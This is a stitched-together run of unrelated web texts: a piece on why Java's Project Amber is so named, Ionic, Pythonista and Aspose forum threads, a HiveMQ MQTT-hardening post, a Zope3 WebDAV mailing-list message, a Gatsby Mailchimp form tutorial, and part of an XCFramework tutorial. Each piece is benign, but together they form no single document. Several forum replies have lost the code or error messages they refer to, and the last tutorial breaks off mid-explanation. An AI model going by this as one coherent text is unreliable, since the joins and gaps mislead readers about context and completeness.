A natural question to have is, when will the project be shipped? When can you start writing that awesome code I keep promising? The most responsible answer is that nobody knows. Leaving responsibility aside, we can speculate a little. Project Lambda, which brought lambda expressions and streams, took a little more than four years from inception in December 2009 to its debuting release in March 2014. Project Jigsaw, notorious for its delays, started a year earlier, in December 2008, and is only being shipped now, making it take almost nine years. Keep in mind, though, that Oracle bought Sun in 2010 and I can only assume that engineering efforts were adversely affected by the transition. Also, it seems to me that both projects are considerably more complex and monolithic than Amber (although both are hard to judge from the outside). Project Amber is more of a roof for various changes that move the language into a common direction but might not have to be shipped at once to make sense. Under this assumption and guessing the project's development time based on Lambda and Jigsaw, it seems plausible that some changes will make it into Java 10. Before you ask: Nobody knows when 10 will be out! Again some speculation: back in 2012 Mark Reinhold, Chief Architect of the Java Platform Group, proposed a two-year release cycle that due to delays became more of a three-year cycle. Extrapolating the future from two data points (luckily I am not bound to scientific standards here), 2020 looks like a good guess. Keep in mind, though, that Project Valhalla started in July 2014 and took on the massive undertaking to implement generic specialization and value types.
It is not targeted for any release yet but it looks like it’s in the time frame to go into 10. If so, it could very well delay the release due to its complexity. So bottom line is: Nobody knows. If I had to bet money I would put it on 2020. Fingers crossed. About That Name… Oh yeah, why is it called Project Amber? Because it’s shiny? Because it preserves dead things? I don’t know. Instead of spending needless cycles thinking about it I opted to ask Brian himself but he was either very secretive or very open: — Brian Goetz (@BrianGoetz) March 17, 2017 He made a proposal, though, that we come up with an explanation, so why not? @nipafx Tell you what. Have a contest to come up with candidates. I'll put real answer in envelope. Then we'll compare best answer to ours! — Brian Goetz (@BrianGoetz) March 17, 2017 So here’s the deal: You leave a comment or tweet (don’t forget to mention me) with your explanation why it might be called Project Amber and I will let Brian and his team choose the one they like best (deadline: March 26th). To make this a real competition, the winner gets a copy of my upcoming book about the Java 9 module system. So what do you think? Why Amber? Two weeks later… Submissions Thank you everybody for your participation. Your ideas: @java @BrianGoetz @nipafx It's an alternate Java universe that has been quarantined in amber (Fringe style). — Branko Juric (@warpedjavaguy) March 28, 2017 @java @BrianGoetz @nipafx Because it's kind of a digestive system that will allow cool ideas to ferment into cool features ? 
— Kwakeroni (@kwakeroni) March 28, 2017 @java @BrianGoetz @nipafx Or more probable: amber was called elektron in Greek, which might mean "beaming Sun" (according to Wikipedia) — Kwakeroni (@kwakeroni) March 28, 2017 @nipafx @sitepointdotcom bc amber is highly conductive (and revered in ancient times) and anything purportedly "revolutionary" is conductive — Emma Lam 🤓 (@emmolam) March 22, 2017 @nipafx @BrianGoetz 1st comes to mind is Jurassic Park. Dunno but this article shows the name Amber in Ancient times — Carl Dea (@carldea) March 18, 2017 @nipafx amber: "because it will make your sticky opaque codebase lean and transparent" :P #java — Nicky Mølholm (@moelholm) March 18, 2017 @nipafx @BrianGoetz wonder of Brian likes Colombian Amber coffee — Zoran Regvart (@zregvart) March 18, 2017 @BrianGoetz @nipafx fancy way to say we should be electrified? amber in Greek is elektron and is related to triboelectric effect? 🙂 my2cent — Luca Guadagnini (@lucaguada) March 17, 2017 Every time people mention “Amber” I remember this part of Jurasic Park haha, maybe all this new features are coming from the DNA of old programmers but with fresh ideas. (Juan Moreno) Project Coin -> Milling project coin -> While we’ve got our hands rummaging around in the treasure chest we also happen to find a semi precious stone -> Amber (Andreas Aronsson) Amber simply contains all that we wanted for that project: First astonishment to catch your interest, then momentum to keep you going, brilliance shining everywhere, encouraging you not only to evolute but to revolutionize your code. (matameko) We didn’t want Java to become fossilized, but we also want the features we’re adding to make the language dazzle again! (Jim Bethancourt) I guess they just had name contest and there’s no logic behind it. Nice. Shiny. Short. No problems with other cultures and languages. (Jukka Nikki) It could be also name of daughter of project lead. 
(Jukka Nikki) And The Winner is… … Kwakeroni (hand-picked by Brian Goetz himself) with: @java @BrianGoetz @nipafx Or more probable: amber was called elektron in Greek, which might mean "beaming Sun" (according to Wikipedia) — Kwakeroni (@kwakeroni) March 28, 2017 Congratulations! 😀 On your great detective skills as well as the prize. While the explanation is definitely intriguing, Brian has another one: @nipafx Our inspiration was from the Zelazny "Amber" books, in which "walking the Pattern" was a central theme. — Brian Goetz (@BrianGoetz) April 2, 2017 So now we know why the project revolutionizing Java is called Amber.
https://www.sitepoint.com/project-amber-will-revolutionize-java/?utm_source=sitepoint&utm_medium=articletile&utm_campaign=likes&utm_term=java
Hi, i am new using this framework, need your help. Actually i want when i click on image a new page must be shown, how to do this? sorry for my bad english

Just add inside your image (click)="yourFunction()". Or make your image inside a div:

    <div (click)="yourFunction()">
      <img>
    </div>

yes i did like (click)="openPharmacyPage()". but its not working, it shows me error like this, and code for openPharmacyPage is

what's the code of your function? i mean 'openPage()' can you show me your function openPage()

yeah sure, actually the real function is openPharmacyPage() and code of this function is

This happens a lot, just restart your server: ionic serve

after restarting it is showing me this error. actually i dont want to open it in navigation or side menu, i just want to open it like another screen, just like the first screen, and the screen will be the page named PharmacyPage

I need to see your whole page.ts and page.html to be safe

this is page.html and this is code in app.component.ts file where i have defined the function (click)="openPharmacyPage()" within img. please help me out, its my semester project

Just throwing it out there but it sounds like your stuff is in the wrong place. If your html is called "page.html" and that is where the click event is, then the function "openPharmacyPage()" would need to be in "Page.ts" not in "app.component.ts". The reason you are getting that error is because it can't find the "openPharmacyPage" function in the correct scope. It is looking for it in "Page.ts"

if i place it in page.ts i have to change code to display another page which i want to show and the code is not working in page.ts too i have checked

Hmm… sounds like a scope problem to me. Based on your description either the "openPharmacyPage()" needs to be in Page.ts or your html that calls it would need to be in app.html.
The project structure I am seeing based on what you're saying and showing is this…

    src
      app.component.ts
      app.html
      app.module.ts
      app.scss
      main.ts
      pages
        list-page
        blood-page

If this is correct, which of these holds the HTML that calls the function? One last thing I am noticing. You are not setting a root page in your app.component.ts file. You should set "this.rootPage" in app.component.ts, then move the "openPharmacyPage" function to that page, as well as the html. Most commonly you would do something like this in app.component.ts…

    @Component({
      templateUrl: 'app.html'
    })
    export class MyApp {
      rootPage: any = HomePage;

      constructor(...) {
        platform.ready().then(() => {
          statusBar.styleDefault();
          splashScreen.hide();
          this.rootPage = HomePage;
        });
      }
    }

Then in home-page.ts you would have your main home page and the openPharmacyPage function, and in the home-page.html file you would have your html that calls the function.

yes you are right, Home-page holds that function. if i want to do it from home-page.html and home-page.ts then what changes do i need to do

If you want to do this all from HomePage then you are going to want your app.component.ts to do nothing more than load up your HomePage, like so…

app.component.ts

    import { Component } from '@angular/core';
    import { Platform } from 'ionic-angular';
    import { StatusBar } from '@ionic-native/status-bar';
    import { SplashScreen } from '@ionic-native/splash-screen';
    import { HomePage } from '../pages/home/home';

    @Component({
      templateUrl: 'app.html'
    })
    export class MyApp {
      rootPage: any = HomePage;

      constructor(
        public platform: Platform,
        statusBar: StatusBar,
        splashScreen: SplashScreen
      ) {
        this.platform.ready().then(() => {
          statusBar.styleDefault();
          splashScreen.hide();
          this.rootPage = HomePage;
        });
      }
    }

Then in your app.html

    <ion-nav [root]="rootPage" #content></ion-nav>

Now, in your home page you want the actual function and display, so something like…

home.ts

    import { Component } from '@angular/core';
    import { NavController } from 'ionic-angular';
    import { BloodPage } from '../blood/blood';

    @Component({
      selector: 'home-page',
      templateUrl: 'home.html'
    })
    export class HomePage {
      constructor(public navCtrl: NavController) { }

      openPharmacyPage() {
        this.navCtrl.push(BloodPage);
      }
    }

then your home.html

    <ion-header>
      <ion-navbar>
        <ion-title text-center>2Freedom!</ion-title>
      </ion-navbar>
    </ion-header>

    <ion-content>
      <div class="icons_div_left">
        <span>
          <img class="icons_div_img_left" src="../../assets/icon/im..." (click)="openPharmacyPage()">
        </span>
        <span class="txt_divs_left"> Medicine </span>
      </div>
    </ion-content>

Obviously change names as you need to for correct directories, but that is about what it should be.

Thank you soo much, you helped me a lot, its really great

No problem. I know how hard it can be to be stuck on this stuff. If you need anymore help don't hesitate to ask.

yes sure, Thank you. But maybe due to my region every time i have to wait for at least 8 minutes to reply you back
https://forum.ionicframework.com/t/how-to-make-clickable-images/97742
MQTT Security Fundamentals – Securing MQTT Systems

Welcome to the tenth part of the MQTT Security Fundamentals blog post series. In the last posts we focused on how to secure MQTT on a protocol level and shared best practices on how to implement security on the application level. Today's blog post will focus on the secure deployment of an MQTT system. We will take a look at different layers of security and how to harden the deployment to prevent and mitigate attacks. There are different layers of security we need to discuss; in particular we are going to look at these layers:

- The infrastructure
- The operating system
- The MQTT broker

Infrastructure

MQTT brokers are typically deployed on some kind of network infrastructure, so it's very important to understand the network topology of the target system, and it's important to lock out attackers as soon as possible in order to prevent damage and downtime on downstream systems.

Firewall

Every connection to an MQTT broker should pass at least one firewall which implements sophisticated rules for accessing downstream components and parts of the infrastructure. If you are able to block attackers at the firewall level, they won't be able to access any other systems. Unfortunately there is no silver bullet, and firewall rules need to be configured according to the concrete use case. There are many commercial and open source firewall solutions available. A rule of thumb is that only expected traffic gets forwarded to downstream systems. That means any traffic which you don't expect in your downstream applications should be blocked. In the case of operating an MQTT broker, the following traffic could be worth blocking:

- UDP: MQTT uses TCP, so you can block all UDP datagram packets.
- ICMP: While it may not be the smartest idea to block all ICMP traffic, ping and traceroute ICMP packets could be worth investigating as candidates to block.

It's also a good idea to block traffic to any ports which are not needed for your MQTT system.
The MQTT standard ports (1883 for plain MQTT and 8883 for MQTT over TLS) should not get blocked. Where your clients come from known networks, you should only allow traffic from the defined IP ranges; this will lock out any clients which are not in the defined IP ranges.

Load balancer

Load balancers are often used to distribute MQTT traffic to different MQTT brokers, e.g. if the brokers are operated in a cluster. Often these load balancers are proxying the traffic, so it's important to have a load balancer deployed which can handle the traffic and the connection count you're expecting for your production system. Most of the commercial hardware based load balancers can handle huge amounts of connections and are designed for high-traffic scenarios, so typically these just work out of the box. Load balancers typically don't add much additional security, but they are very useful to prevent overload of downstream systems and distribute the traffic to multiple MQTT brokers. Most load balancers are also able to throttle traffic if the traffic is unusually high and you need to slow down MQTT clients in order to prevent overloading of MQTT brokers.

DMZ

A DMZ is a demilitarized zone, and typically internet facing services (like an MQTT broker) reside here. A DMZ is a subnetwork, and all access to downstream services (like databases and internal application services) is protected by an additional firewall. So if an attacker gets access to one of your services in the DMZ, the attacker doesn't get access to other systems (if the firewall is configured properly). In a dual-firewall scenario, firewalls from different vendors are often used so attackers can't use the same compromising techniques if they are able to exploit security holes of a deployed firewall. The Wikipedia article about DMZs is worth a read if you're not familiar with the concept. If you are using HiveMQ plugins to access any internal business services (e.g. webservices or authentication services), we strongly recommend deploying a DMZ.
Operating System

MQTT brokers are most likely installed on servers (virtual and physical) and these servers run an operating system. Before talking about MQTT broker application security, it's very important to understand that many attacks focus on security holes in the operating system or in software and services which are typically installed with the operating system. While it's out of scope of this blog post to give a complete overview of hardening servers, we want to share some tips we found useful for making servers more secure. Please note that the following tips are only valid for Linux based servers.

Keep libraries and software updated

There is no bug-free software and unfortunately some bugs result in security holes. So please keep your system and your software up-to-date. Recent famous security related bugs like the GHOST vulnerability were very simple to fix: by updating specific libraries and software (in the GHOST case, the glibc version). If you are relying on libraries which implement cryptographic algorithms like openSSH or openSSL, it's critical to update these if new security holes are revealed, because these insecure libraries can affect other software. Fortunately it's very easy to stay up-to-date since most Linux distributions have a dedicated package manager which can update all outdated software at once.

Disallow root access and use SSH keys for SSH

If you are using SSH to connect to your server, always disallow root access via SSH, especially if your SSH port is open to the world. Another best practice is to disable password authentication via SSH and use SSH keys for authentication. This adds another layer of security because brute force attempts won't succeed (in contrast to weak passwords if using password authentication).

Install Fail2Ban

Fail2Ban is a neat piece of software which scans different log files on your Linux box (like the SSH log) and detects brute force attacks.
It will automatically update your firewall (like iptables) in order to lock out the attackers. This tool is invaluable if access to SSH ports is possible via the internet.

Set up iptables

If you don't have any external firewall deployed, setting up iptables should be mandatory. Iptables is a software firewall which is preinstalled on most Linux distributions. Even if you have external firewalls, using iptables is highly recommended. Some people may find configuring iptables challenging; fortunately there are tools available which ease the burden of maintaining complex iptables rules, like Shorewall or UFW. Other tools like Fail2Ban rely on iptables and automatically update the rules if malicious clients are detected.

SELinux

Security Enhanced Linux (SELinux) adds mandatory access control on top of the standard Linux permission model and is worth evaluating as an additional hardening measure. The many Linux hardening guides available online are good practical starting points for securing your systems.

MQTT Broker

Even if a reliable and secure network infrastructure is in place and your Linux system is hardened, there are still improvements that can be made at the MQTT broker level, e.g. by separating topic namespaces. X509 client certificates add another layer of security and you should consider using them if it's feasible for your concrete use case.

TLS

Secure MQTT deployments typically use TLS for transport layer encryption, so no eavesdropper can read and intercept the MQTT traffic from broker to clients and vice versa. While TLS adds extra bandwidth overhead to the communication, the gained security is almost always worth it. If you haven't read it yet, we suggest taking a look at our blog post about MQTT and TLS.

Throttling

If you know the bandwidth usage characteristics of your MQTT deployment beforehand, throttling MQTT clients can add additional protection against overloading MQTT brokers. Today bandwidth is still expensive and limited. A few malicious MQTT clients with enough bandwidth available can overload your system very quickly and consume all your bandwidth, which may lead to service degradation and can be very expensive.
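As an illustration of the throttling idea (this is a generic sketch, not HiveMQ's actual implementation), a per-client byte budget is often modeled as a token bucket: tokens refill at the allowed rate, and a message is only accepted if enough tokens are available for its size.

```javascript
// Generic token-bucket rate limiter of the kind a broker could apply
// per client. Rates and sizes here are illustrative.
class TokenBucket {
  constructor(ratePerSec, burst) {
    this.rate = ratePerSec;  // tokens (bytes) refilled per second
    this.capacity = burst;   // maximum burst size in bytes
    this.tokens = burst;     // start with a full bucket
    this.last = Date.now();
  }

  // Returns true if `cost` bytes may pass now, false if throttled.
  allow(cost) {
    const now = Date.now();
    const elapsedSec = (now - this.last) / 1000;
    this.tokens = Math.min(this.capacity, this.tokens + elapsedSec * this.rate);
    this.last = now;
    if (this.tokens >= cost) {
      this.tokens -= cost;
      return true;
    }
    return false;
  }
}

const perClient = new TokenBucket(1024, 4096); // ~1 KiB/s, 4 KiB burst
console.log(perClient.allow(2048)); // true: within the burst budget
console.log(perClient.allow(4096)); // false: bucket is drained
```

A broker applying such a bucket per client identifier can slow down or disconnect clients that exceed their budget without affecting well-behaved ones.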
HiveMQ allows throttling on a global and a per-client basis. You can limit the total incoming bytes per second and the total outgoing bytes per second independently, so if you know you can only afford 20 Mbit of traffic (otherwise traffic would get too expensive) but your network and network interfaces can handle 100 Mbit, it may be wise to throttle the broker to this limit. These limits can be changed while HiveMQ is up and running and no restart is needed. In addition to the global throttling, it's possible to throttle specific clients (e.g. based on client identifier) with the HiveMQ plugin system after the clients have authenticated successfully.

Message Size

MQTT defines a maximum message size of 256MB. In most MQTT deployment scenarios messages are much smaller, often smaller than a kilobyte. If you know your usage scenario very well and you know the maximum message size that can occur, it's a wise decision to decrease the maximum allowed message size to that limit. Malicious MQTT clients could otherwise send huge messages, which may result in excessive memory consumption and unneeded bandwidth usage. HiveMQ allows limiting the maximum message size on a global and per-client basis.

Summary

We have seen that securing MQTT systems – like any IT system – can be challenging and security needs to be considered at many levels. We have seen that it's important to know your network infrastructure and your servers very well, and that they need to be configured conscientiously. If you missed an important tip or feel that we should add additional things, let us know in the comments! So that's the end of part ten.
https://www.hivemq.com/blog/mqtt-security-fundamentals-securing-mqtt-systems
module location doesn't seem to work

I am new to Pythonista and learning every day more about this wonderful app. I am trying to use location.get_location(), but all I get is None. I know that I should allow Pythonista to use the location, but I never got the question for permission. Also, I can't see Pythonista in the list of apps with/without access to location services in the Privacy/Location Services setting. Please advise.

Does this work?

    import location, time

    def getLocation():
        location.start_updates()
        time.sleep(1)  # give GPS hardware a second to wake up
        currLoc = location.get_location()
        location.stop_updates()  # stop GPS hardware ASAP to save battery
        return currLoc

    print(getLocation())

Yes, this works! Thank you very much.
https://forum.omz-software.com/topic/508/module-location-doesn-t-seem-to-work
Hi, I purchased your component yesterday after testing some of our in-house pdfs. It worked fine at the time, but since I purchased it, I've been getting mixed results with jpg conversion. I have attached 4 files below, 2 pdfs and their resulting jpgs:

    E008DJR091811.pdf -> 10.jpg
    budget_blinds.pdf -> 11.jpg

I started with the E008 pdf file and converted it to the 10.jpg. You'll see that it's only one side of the page and the font is jumbled. I then took the E008 pdf, cropped the budget_blinds ad, and saved it as a PDF in Photoshop, then converted it using Aspose.PDF. This resulted in a blank image, so I opened the budget_blinds.pdf in Acrobat and saved it as an optimized PDF, then converted to jpg with Aspose.PDF again, which again resulted in a blank image. Am I doing something wrong, or are the PDFs poorly formed, or is there an issue with the PDF conversion?

Hi Michael,

Thank you for considering Aspose. I tested your scenario with your shared template files and I am able to reproduce the issues you mentioned. Your issues are logged in our issue tracking system with issue ids PDFNEWNET-30757 and PDFNEWNET-30758. Our development team will look into these issues and we will update you via this forum thread regarding any progress. Sorry for the inconvenience.

The issues you have found earlier (filed as 30757) have been fixed in this update. This message was posted using Notification2Forum from Downloads module by aspose.notifier.

The issues you have found earlier (filed as PDFNET-30758) have been fixed in Aspose.PDF for .NET 20.3.
https://forum.aspose.com/t/pdf-to-jpg-results-in-blank-image/104642
Hi All, I have been quite busy lately trying to improve WebDAV support for Zope3. To this end I have two proposals worth your consideration. I don't yet have access to the proposals area of zope.org but I have put them up in my home folder on zope.org for the time being. They are:

WebDAV Namespace Management: Here I define how, and why, I am planning to manage a WebDAV namespace. This includes how to find which properties are defined on an object, what widget to use to display the property, and how to extend an already registered WebDAV namespace. My goal for all this has been to develop zope.app.dav to a point where it can handle all of the WebDAV protocol details according to the RFC2518 specification, while only requiring a minimal knowledge of WebDAV from developers who just wish to integrate the WebDAV protocol into their application. Also, I have been doing a lot of reading of specifications, and by using these changes I hope to begin development of other WebDAV protocols once I have finished with the core WebDAV support.

Hope you like it, and any improvements / comments will be most appreciated.

Michael
--
Michael Kerrin
55 Fitzwilliam Sq.,
Dublin 2.
Tel: 087 688 3894

_______________________________________________
Zope3-dev mailing list
Zope3-dev@zope.org
https://www.mail-archive.com/zope3-dev@zope.org/msg03918.html
Adding a Mailing List to Your Gatsby Site

Yes, we all get far too many emails. There's basically a whole sub-genre of memes dedicated to the topic. Nonetheless, newsletters and mailing lists are often one of the most effective ways we have to communicate with our users, customers, readers, etc. So, what if I wanted to create a simple form on my site that let people enter their email and sign up for my mailing list? In this post, we'll quickly look at how you can add a newsletter sign up form to a Gatsby site that automatically subscribes a user to a mailing list on Mailchimp. The site we'll work on was built using Stackbit, so if you used Stackbit to build your Gatsby site, it'll be easy to follow along; however, there is nothing Stackbit specific about the code and integrations. You can find the code in this sample project, where I've been working on a number of upgrades to an existing Stackbit generated site.

Installing and Configuring the Gatsby Plugin

You probably won't be surprised that Gatsby already has a plugin to integrate with Mailchimp. We'll take advantage of this as it makes the process of adding a subscription form much simpler. Start by installing the plugin into your existing project:

    npm install gatsby-plugin-mailchimp

The plugin has a very minimal amount of required configuration. While it has some additional options that you can read about in the documentation, the only required configuration parameter is a Mailchimp endpoint. For example, here is the configuration added to plugins within my gatsby-config.js:

    ...
    {
      resolve: 'gatsby-plugin-mailchimp',
      options: {
        endpoint: ''
      }
    }

To obtain your endpoint URL, log into your Mailchimp account and go to "Audience" > "All Contacts" from the top navigation. Once there, click "Signup forms" and then "Embedded forms". This will open a page with HTML that you can copy to add an embedded form on your site. However, we don't want the full embedded form code as we are creating a custom form.
We only want the endpoint URL in the action attribute of the form as seen below. Paste that URL into the endpoint option for the plugin configuration and we are done with configuration.

Updating the Form Code

You can create your subscribe form code from scratch depending on what site you are working on. If you are building your own, you can skip ahead to the finished component. In my case, my site was generated using Stackbit's Azimuth template, which already has an existing SubscribeForm.js component that renders a mailing list subscription form. It has been preconfigured to submit directly to Netlify's Forms functionality. Here's the code:

    import React from 'react';

    export default class SubscribeForm extends React.Component {
      render() {
        return (
          <form name="subscribeForm" method="POST" netlifyHoneypot="bot-field" data-netlify="true">
            <div className="screen-reader-text">
              <label>
                Don't fill this out if you're human:
                <input name="bot-field" />
              </label>
            </div>
            <div className="form-row">
              <label>
                <span className="screen-reader-text">Email address</span>
                <input className="subscribe-email" type="email" name="email" placeholder="Enter Email Address..." />
              </label>
            </div>
            <input type="hidden" name="form-name" value="subscribeForm" />
            <button className="button" type="submit">
              Subscribe
            </button>
          </form>
        );
      }
    }

First, let's remove the code specific to Netlify Forms. Remove the netlifyHoneypot="bot-field" and data-netlify="true" attributes from the form tag. Remove the entire div containing the bot-field hidden form field. Finally, remove the hidden form-name field. The finished form component is simple, only containing a single form input for the email and a submit button.
It should look something like this:

```javascript
import React from 'react';

export default class SubscribeForm extends React.Component {
    render() {
        return (
            <form name="subscribeForm" method="POST" id="subscribe-form" className="subscribe-form">
                <div className="form-row">
                    <label>
                        <span className="screen-reader-text">Email address</span>
                        <input className="subscribe-email" type="email" name="email" placeholder="Enter Email Address..." />
                    </label>
                </div>
                <button className="button" type="submit">
                    Subscribe
                </button>
            </form>
        );
    }
}
```

Connecting the Form to Mailchimp

The first thing we'll need to do is add state to the component: the email entered in the form, and a message item that will hold the response sent back from Mailchimp via the plugin (it already sends friendly HTML-formatted messages we can use). The handleInputChange method is taken directly from Gatsby's handling forms documentation for updating the state based upon form input changes.

```javascript
state = {
    email: '',
    message: ''
};

handleInputChange = (event) => {
    const target = event.target;
    const value = target.value;
    const name = target.name;
    this.setState({
        [name]: value
    });
};
```

Next, let's connect the value of our email input to the component state and handle updating the state:

```javascript
<input
    className="subscribe-email"
    type="email"
    name="email"
    placeholder="Enter Email Address..."
    value={this.state.email}
    onChange={this.handleInputChange}
/>
```

Next, we need some way to display the message response to the user. We'll want that to be highlighted in some meaningful way. For example, within Azimuth, I added a new style to _general.scss under the subscribe form section that uses the bright orange accent color already configured in the styles.

```scss
.message {
    color: _palette(accent-orange);
}
```

Now let's add the message to the form by adding a div before the form-row containing the email input:

```javascript
<div className="message" dangerouslySetInnerHTML={{ __html: this.state.message }} />
```

Now we're ready to make the final connection to the plugin.
Of course, we need to add the plugin to our imports:

```javascript
import addToMailchimp from 'gatsby-plugin-mailchimp';
```

Let's add the submit handler. The code for this is only a few lines, passing the email to the call to Mailchimp and setting the message in our state to the message in the response:

```javascript
handleSubmit = async (e) => {
    e.preventDefault();
    const result = await addToMailchimp(this.state.email);
    this.setState({
        message: result.msg
    });
};
```

Finally, we just need to wire the form to call this function when the user clicks submit by adding an onSubmit handler to the form:

```javascript
onSubmit={this.handleSubmit}
```

The Form in Action and Next Steps

We're done! Let's go ahead and test this out. I've connected mine to an existing mailing list I had for new and throwback music picks called Coda Breaker. Entering an email address that is not yet subscribed will display a message indicating that they need to confirm their subscription, as that is how our email list is configured in Mailchimp. If I enter an email address that is already subscribed, I'll get an error message instead.

Moving forward, you may want to expand your form to include more information about the user for your list, and that is completely possible using the plugin. The plugin allows for a second parameter to the addToMailchimp function called listFields, which is a structure containing additional values about the user for your list. You can reference the plugin documentation for more details.
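To sketch what passing listFields might look like, here is a minimal, self-contained example. Note that addToMailchimp is stubbed here so the snippet runs without a live Mailchimp account, and FNAME is a hypothetical merge field name; check your own audience settings for the real field names.

```javascript
// Stub standing in for the plugin's addToMailchimp export, so the
// call shape can be demonstrated without a real Mailchimp endpoint.
const addToMailchimp = async (email, listFields) => ({
  result: 'success',
  msg: `${email} subscribed with ${JSON.stringify(listFields)}`,
});

// Hypothetical submit handler that passes extra list fields along
// with the email address.
async function subscribe(email, firstName) {
  // FNAME is a commonly used Mailchimp merge field; adjust to your list.
  const result = await addToMailchimp(email, { FNAME: firstName });
  return result.msg;
}

subscribe('jane@example.com', 'Jane').then(console.log);
```

In the real component, you would replace the stub with the plugin's import and add more state fields mirroring the email handling shown earlier.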
In WWDC 2019, Apple announced a brand new feature for Xcode 11: the capability to create a new kind of binary framework with a special format called XCFramework. That was fantastic news for everyone, since an inconvenient situation that had lasted for years finally came to its end.

Up until then, a binary framework could be used on one target platform only, and for a specific family of devices. For example, it was officially impossible to build a framework that would contain code targeting both real iOS devices and the Simulator. Unofficial solutions had come up, of course, with the so-called fat frameworks; however, such a framework usually didn't make it all the way to the App Store. It was a good reason for rejection, so fat frameworks were good just for development. Similarly, it was impossible to add a single framework to multiple platforms, such as both iOS and macOS, so distributing different frameworks for different platforms was the rule.

All that came to change with the XCFramework format, since it's a type of framework that provides a common roof for multiple variants of the same framework. A XCFramework can wrap up a variant of a framework that works on iOS devices, another variant that works in the Simulator, another one for macOS, one more for watchOS, and so on. In short, XCFramework can bundle up any framework with flavours for any platform or device that Xcode supports. Everything in one single place, with one single item to distribute.

However, all that is news from last year. This year, in WWDC 2020, Apple announced something else regarding XCFrameworks that boosts their distribution: starting in Xcode 12, Swift packages can be used to distribute binary frameworks of the XCFramework format. That is really amazing news, because so far a Swift package could be used to distribute only open-source code. Now, it's becoming feasible to distribute binary code as well, bundled up in a XCFramework.
We had talked thoroughly about Swift packages in the past in this post, and you're prompted to read it if you haven't done so already. This post is dedicated to all the above, and to be specific, it has a double goal:

- To teach how to create a XCFramework binary framework based on framework variants that provide similar functionality for multiple target platforms.
- To teach how to use Swift packages in order to distribute a XCFramework, whether both are local or remote.

Before I present the roadmap of this tutorial, I really recommend you watch the WWDC 2019 – Session 416, because it contains several interesting topics that won't be discussed here, such as versioning or framework author considerations. You should also watch this year's video about how to distribute binary frameworks as Swift packages, as it will give you an overview of how all this works. Finally, keep this help page handy, as it provides the outline on how to create a XCFramework.

Having said all the above, let's have a quick look at what's coming next, and then let's start working our way towards the creation of a XCFramework binary framework.

An Overview Of What's Coming Up

One could say that this tutorial is composed of two parts. The first one is the place where we're going to learn how to create a XCFramework binary framework from the beginning. In order to do that, we'll start from scratch with two other frameworks that offer similar features for both the iOS and macOS platforms, and we'll use Terminal (extensively in this post) to archive them, to build the desired XCFramework, as well as to perform other command line based tasks.

The final goal here is to make it possible to add the same binary framework only (the XCFramework) to an iOS and a macOS application, and have everything work properly on all possible devices: iOS devices, Simulator, Macs. The second part of the tutorial focuses on how to use the XCFramework that we'll produce in the first step along with Swift packages.
In fact, we'll meet two different variations of that. In the first one, we'll see how to have a binary framework as a Swift package where both the framework and the package exist locally. In the second, we'll learn how to make both of them reside remotely, with the binary framework and the package being stored in different locations but still usable as one entity.

Even though we'll create various projects in Xcode in order to create the base frameworks or the Swift packages, the demo applications that we'll use to try everything on can be downloaded from here. What you'll find in that starter pack is two projects, one for iOS and one for macOS, that contain a view subclass (UIView and NSView respectively) along with a counterpart XIB file. In the next part you're going to understand what these views are all about, and what we want to achieve with them. For now, download that starter material, take a quick look if you want, and then get ready for some really interesting work.

Creating The Two Binary Frameworks

We'll start off by creating the two frameworks mentioned in the previous part from scratch: one for the iOS platform, and one for macOS. We'll add similar source code to both of them that performs the exact same functionality on both platforms, which will be no more than just loading a view's contents from a XIB file. That simple functionality is more than enough to demonstrate the topic of this post, and it has the least importance in the overall process.

Focusing for a moment on the source code, both frameworks will implement a protocol called XIBLoadable. It will contain two required methods: one for loading the XIB contents, and one that adds the view object using XIBLoadable to its parent view by setting the necessary auto layout constraints. A default implementation of both methods will be provided in a protocol extension, so they can be used out of the box on each platform.
Obviously, their implementation will depend on the UIKit framework on iOS, and on the AppKit framework on macOS. However, the way they'll eventually be used is going to be identical for both platforms. The best thing above all is that the same framework (XCFramework) will be used in both cases!

Before we begin, you are advised to store both framework projects we're just about to create in the same subfolder. This will help you get along smoothly later with the commands that we'll need to write in Terminal. With that said, it's about time to bring the iOS-based framework to life.

The XIBLoadable-iOS Framework

In Xcode, go to the File > New > Project… menu in order to start a new project. Choose the iOS platform, and the Framework template in the Framework & Library section. In the next step, name the framework XIBLoadable-iOS. We'll call the macOS version XIBLoadable-macOS respectively, and that naming will help perform common operations on both frameworks, making it possible to easily distinguish them later on. Finally, find a proper place to save the new project on your disk and finish the creation process.

Right after the project gets ready and lies just in front of your eyes, press Cmd+N on your keyboard and choose to create a new Swift File for the iOS platform. We need a source file in order to add the XIBLoadable protocol implementation. It doesn't really matter how that file will be named. For convenience though, let's give it the name of the protocol we'll implement right next: XIBLoadable.

Once the new file is created, start by replacing the existing import statement with an import of UIKit. Next, let's define the protocol along with the two required methods. The protocol is marked as public in order to be accessible from any other module that will be using it (such as the demo project you downloaded). The two methods will also be marked as public in the default implementation that is coming right next.
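The original code listings did not survive extraction, so here is a sketch of what the full iOS file might look like. The method names load(from:) and add(to:) come from later sections of the post; the exact signatures and the use of Bundle.main are assumptions.

```swift
import UIKit

public protocol XIBLoadable {
    // Loads the top level view of the given XIB file and adds it as a subview.
    @discardableResult func load(from xibName: String) -> Bool
    // Adds the view adopting the protocol to the given parent view.
    func add(to parentView: UIView)
}

extension XIBLoadable where Self: UIView {
    @discardableResult
    public func load(from xibName: String) -> Bool {
        // Try to load the top level views of the XIB file; bail out on failure.
        guard let views = Bundle.main.loadNibNamed(xibName, owner: self, options: nil),
              let xibView = views.first as? UIView else { return false }

        // Add the loaded view as a subview, pinned to all edges.
        addSubview(xibView)
        xibView.translatesAutoresizingMaskIntoConstraints = false
        NSLayoutConstraint.activate([
            xibView.topAnchor.constraint(equalTo: topAnchor),
            xibView.bottomAnchor.constraint(equalTo: bottomAnchor),
            xibView.leadingAnchor.constraint(equalTo: leadingAnchor),
            xibView.trailingAnchor.constraint(equalTo: trailingAnchor)
        ])
        return true
    }

    public func add(to parentView: UIView) {
        // Snap this view to all edges of the parent using matching anchors.
        parentView.addSubview(self)
        translatesAutoresizingMaskIntoConstraints = false
        NSLayoutConstraint.activate([
            topAnchor.constraint(equalTo: parentView.topAnchor),
            bottomAnchor.constraint(equalTo: parentView.bottomAnchor),
            leadingAnchor.constraint(equalTo: parentView.leadingAnchor),
            trailingAnchor.constraint(equalTo: parentView.trailingAnchor)
        ])
    }
}
```

The Self: UIView constraint and the @discardableResult attribute are discussed right next.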
Note: Want to know more about access levels in Swift? Take a look at this tutorial.

Right after the protocol's closing comes its extension. The Self: UIView condition limits the use of the protocol methods to UIView types only; what they're supposed to do is meaningful just to views, so no other type should be able to use the default implementation.

